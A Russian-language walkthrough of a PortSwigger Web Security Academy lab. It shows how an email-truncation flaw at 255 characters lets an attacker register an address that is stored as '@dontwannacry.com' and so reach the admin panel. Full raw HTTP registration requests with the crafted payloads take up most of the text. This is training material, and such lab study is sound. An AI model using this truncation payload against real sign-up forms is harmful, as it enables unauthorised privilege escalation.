В лабе плохо валидируется ввод. Для решения нужно получить доступ к панели администратора и удалить пользователя carlos.

https://0aec001f0315d694808776da000c00bf.web-security-academy.net/

Solution

Попробую зарегистрироваться на сайте.

POST /register HTTP/2
Host: 0aec001f0315d694808776da000c00bf.web-security-academy.net
Cookie: session=YllAjaKC7P1WXFK16u5nBoQ7MfbpCd4F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0aec001f0315d694808776da000c00bf.web-security-academy.net/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: https://0aec001f0315d694808776da000c00bf.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=zdYUHH7AEaRsWIp7nvMjWaGKH3cZUZOu&username=name&email=attacker%40exploit-0aab00d803fad6a58091759a01fb00c8.exploit-server.net&password=11223344

Я не знаю что или кто это, но я неприменно от них.

IMG

Это как-то должно проверяться. Попробую вставить почту, а потом уже этот домен:

POST /register HTTP/2
Host: 0aec001f0315d694808776da000c00bf.web-security-academy.net
Cookie: session=YllAjaKC7P1WXFK16u5nBoQ7MfbpCd4F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0aec001f0315d694808776da000c00bf.web-security-academy.net/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Origin: https://0aec001f0315d694808776da000c00bf.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=zdYUHH7AEaRsWIp7nvMjWaGKH3cZUZOu&username=name1&email=attacker%40exploit-0aab00d803fad6a58091759a01fb00c8.exploit-server.net@dontwannacry.com&password=11223344

Не прокатило. Разные разделители я тоже попробовал. А почему нет, если да. Попробую сделать длинную почту. Домен все равно мой.

POST /register HTTP/2
Host: 0aec001f0315d694808776da000c00bf.web-security-academy.net
Cookie: session=YllAjaKC7P1WXFK16u5nBoQ7MfbpCd4F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0aec001f0315d694808776da000c00bf.web-security-academy.net/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
Origin: https://0aec001f0315d694808776da000c00bf.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=zdYUHH7AEaRsWIp7nvMjWaGKH3cZUZOu&username=name1&email=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaattacker%40exploit-0aab00d803fad6a58091759a01fb00c8.exploit-server.net&password=11223344

Нас обрезали)

IMG

>>> s = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaattacker@exploit-0aab00d803fad6a58091759a01fb00c8.explo'
>>> len(s)
255

Строка имеет длину 255.

Попробую скрафтить пейлоад так, чтобы name + @dontwannacry.com были равны по длине 255, а далее добавлюexploit-0aab00d803fad6a58091759a01fb00c8.exploit-server.net:

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo@dontwannacry.com.exploit-0aab00d803fad6a58091759a01fb00c8.exploit-server.net

Отправлю:

POST /register HTTP/2
Host: 0aec001f0315d694808776da000c00bf.web-security-academy.net
Cookie: session=UHNhJJEiNwfSjQ82w5Sj8QLoiqIdJq5x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0aec001f0315d694808776da000c00bf.web-security-academy.net/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 383
Origin: https://0aec001f0315d694808776da000c00bf.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=S6QwN8oGurEn0etIEdkxg7w6sJj2axjx&username=1&email=oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo%40dontwannacry.com.exploit-0aab00d803fad6a58091759a01fb00c8.exploit-server.net&password=1

IMG

А вот и админ панель:

IMG

carlos удален, значит лаба решена.

IMG